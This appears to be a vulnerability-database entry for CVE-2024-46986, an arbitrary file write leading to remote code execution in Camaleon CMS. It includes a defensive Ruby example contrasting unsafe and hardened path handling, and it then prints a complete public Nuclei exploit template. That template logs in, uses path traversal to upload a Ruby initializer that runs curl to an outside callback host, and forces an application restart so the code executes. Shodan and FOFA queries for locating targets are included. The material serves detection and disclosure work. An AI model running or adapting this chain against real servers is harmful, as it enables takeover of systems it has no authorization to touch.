CVE-2024-46986: Camaleon CMS < 2.8.1 Arbitrary File Write to RCE

Date: 2025-08-01 | Affected software: Camaleon CMS | PoC: public

Vulnerability description

An arbitrary file write vulnerability reachable through the upload method of MediaController allows authenticated users to write files to any location on the server hosting Camaleon CMS, subject only to the permissions of the underlying filesystem. This escalates to remote code execution when the attacker can write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application, because every file in that directory is loaded and executed when the application boots.
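The bug class behind the description, as an added illustration that is not Camaleon CMS code: a hypothetical upload handler that joins the client-supplied "folder" field onto the media root without confinement, beside a hardened version that canonicalizes the path and rejects anything resolving outside the root. The function names, the PathTraversalError class and the directory layout built in demo are assumptions for this example.

```ruby
require "tmpdir"
require "fileutils"

# Added illustration of the bug class in CVE-2024-46986, not Camaleon CMS code.
# Function names, PathTraversalError and the directory layout built in demo
# are assumptions for the example.

class PathTraversalError < StandardError; end

# Vulnerable shape: the client-controlled "folder" form field is joined onto
# the media root as-is. File.join does no normalization, so a folder value of
# "../../../config/initializers/" walks out of the media root.
def unsafe_media_path(media_root, folder, name)
  File.join(media_root, folder, name)
end

# Hardened shape: canonicalize root and target, then require the target to sit
# below the root. The prefix check uses a separator-terminated root so that
# "/srv/media" does not accept "/srv/media-evil/x".
def safe_media_path(media_root, folder, name)
  if name.nil? || name.empty? || name.include?("/") || name.include?("\\") || %w[. ..].include?(name)
    raise PathTraversalError, "rejected filename #{name.inspect}"
  end
  folder = folder.to_s
  # File.expand_path treats a leading "~" as a home directory; refuse it outright.
  raise PathTraversalError, "rejected folder #{folder.inspect}" if folder.start_with?("~")

  root = File.expand_path(media_root)
  target = File.expand_path(File.join(folder, name), root)
  unless target.start_with?(root + File::SEPARATOR)
    raise PathTraversalError, "path escapes media root: #{target}"
  end
  target
end

# Runs both handlers against a throwaway Rails-like tree (constructed here)
# with the kind of folder value an attacker sends, and returns what happened.
def demo
  Dir.mktmpdir("traversal-demo") do |app|
    media_root = File.join(app, "public", "media")
    initializers = File.join(app, "config", "initializers")
    FileUtils.mkdir_p(media_root)
    FileUtils.mkdir_p(initializers)

    # Two levels reach the app root in this layout; the template sends three,
    # so the right depth depends on where the media root actually sits.
    folder = "../../config/initializers/"
    name = "evil.rb"

    File.write(unsafe_media_path(media_root, folder, name), "`id`\n")
    written_outside = File.exist?(File.join(initializers, name))

    blocked = begin
      safe_media_path(media_root, folder, name)
      false
    rescue PathTraversalError
      true
    end

    legit = safe_media_path(media_root, "2024/08", name)

    {
      written_outside: written_outside, # true: the unsafe join escaped the root
      blocked: blocked,                 # true: the hardened check refused it
      legit_inside: legit.start_with?(File.expand_path(media_root) + File::SEPARATOR),
    }
  end
end

if __FILE__ == $PROGRAM_NAME
  demo.each { |k, v| puts "#{k}: #{v}" }
end
```

The containment check is done on the expanded path rather than by stripping "../" substrings, which is the usual mistake: stripping leaves "....//" and absolute-path variants alive, while a prefix test on the canonical target catches all of them with one rule.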

PoC code [public]

id: CVE-2024-46986

info:
  name: Camaleon CMS < 2.8.1 Arbitrary File Write to RCE
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    An arbitrary file write vulnerability reachable through the upload method of MediaController allows authenticated users to write files to any location on the server hosting Camaleon CMS, subject only to the permissions of the underlying filesystem. This escalates to remote code execution when the attacker can write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application, because every file in that directory is loaded when the application boots.
  reference:
    - https://github.com/advisories/GHSA-wmjg-vqhv-q5p5
    - https://codeql.github.com/codeql-query-help/ruby/rb-path-injection
    - https://owasp.org/www-community/attacks/Path_Traversal
    - https://github.com/nomi-sec/PoC-in-GitHub
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2024-46986
    cwe-id: CWE-22,CWE-74
    epss-score: 0.87788
    epss-percentile: 0.99443
    cpe: cpe:2.3:a:tuzitio:camaleon_cms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    verified: true
    vendor: tuzitio
    product: camaleon_cms
    shodan-query: title:"Camaleon CMS"
    fofa-query: title="Camaleon CMS"
  tags: cve,cve2024,camaleon,intrusive,rce,file-upload,authenticated

variables:
  username: "{{username}}"
  password: "{{password}}"
  filename: "{{to_lower(rand_text_alpha(12))}}"

flow: http(1) && http(2) && http(3) && http(4)

http:
  - raw:
      - |
        GET /admin/login HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        internal: true
        name: nonce
        group: 1
        regex:
          - 'name="authenticity_token" value="(.*?)"'

  - raw:
      - |
        POST /admin/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Connection: keep-alive

        authenticity_token={{nonce}}&user%5Busername%5D={{username}}&user%5Bpassword%5D={{password}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(location,"/admin/dashboard")'
        internal: true

  # Step 3: the vulnerable upload. The "folder" field is joined onto the media
  # root without confinement, so the traversal drops a .rb file into
  # config/initializers/, where it runs on the next application boot.
  - raw:
      - |
        POST /admin/media/upload?actions=false HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8

        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="file_upload"; filename="{{filename}}.rb"
        Content-Type: text/x-ruby-script

        `curl {{interactsh-url}}`
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="folder"

        ../../../config/initializers/
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="skip_auto_crop"

        true
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8--

    matchers:
      - type: word
        part: body
        words:
          - '{"name":"{{filename}}.rb","folder_path":"../../../config/initializers"'
        internal: true

  # Step 4: write tmp/restart.txt, the restart trigger honoured by Phusion
  # Passenger, so the app reloads and executes the planted initializer.
  # Success is confirmed by the DNS callback to the interactsh host.
  - raw:
      - |
        POST /admin/media/upload?actions=false HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8

        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="file_upload"; filename="restart.txt"
        Content-Type: text/x-ruby-script

        {{randstr}}
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="folder"

        ../../../tmp/
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="skip_auto_crop"

        true
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8--

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: word
        part: body
        words:
          - '{"name":"restart.txt","folder_path":"../../../tmp"'
# digest: 490a00463044022067cb70f4f8d7202353f85343a8df880ff11a4c77f3fad13c595bdd9c801e070202206c135c2490325094a385fc7626bfcd58e8a9128f068662b37502a8c62f759526:922c64590222798bb761d5b6d8e72950
